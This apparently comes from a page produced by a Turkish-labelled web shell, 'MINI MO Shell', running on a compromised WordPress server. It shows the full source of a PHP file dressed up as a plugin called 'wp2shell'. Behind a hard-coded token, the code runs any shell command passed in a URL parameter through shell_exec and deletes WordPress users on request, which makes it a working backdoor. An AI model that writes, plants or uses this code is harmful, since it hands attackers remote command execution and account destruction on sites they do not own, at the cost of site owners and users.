GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/wp2shell_81dfab9b/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/wp2shell_81dfab9b/wp2shell_81dfab9b.php

<?php
/*
Plugin Name: wp2shell
Description: Temporary command runner.
*/
if (hash_equals('e0ab7d91071043704501bc2717ab186e', (string) ($_GET['t'] ?? '')) && isset($_GET['c'])) {
    chdir(__DIR__);
    echo 'WP2SHELL::' . shell_exec((string) $_GET['c']) . '::END';
} elseif (hash_equals('e0ab7d91071043704501bc2717ab186e', (string) ($_GET['t'] ?? '')) && isset($_GET['delete_user'])) {
    require_once dirname(__DIR__, 3) . '/wp-load.php';
    require_once ABSPATH . 'wp-admin/includes/user.php';
    $user = get_user_by('login', (string) $_GET['delete_user']);
    $ok = $user ? wp_delete_user((int) $user->ID, (int) ($_GET['reassign'] ?? 0)) : false;
    echo 'WP2SHELL::' . ($ok ? 'deleted' : 'failed') . '::END';
}

OHA YOOO - Tarih: 2026-08-03 22:23:07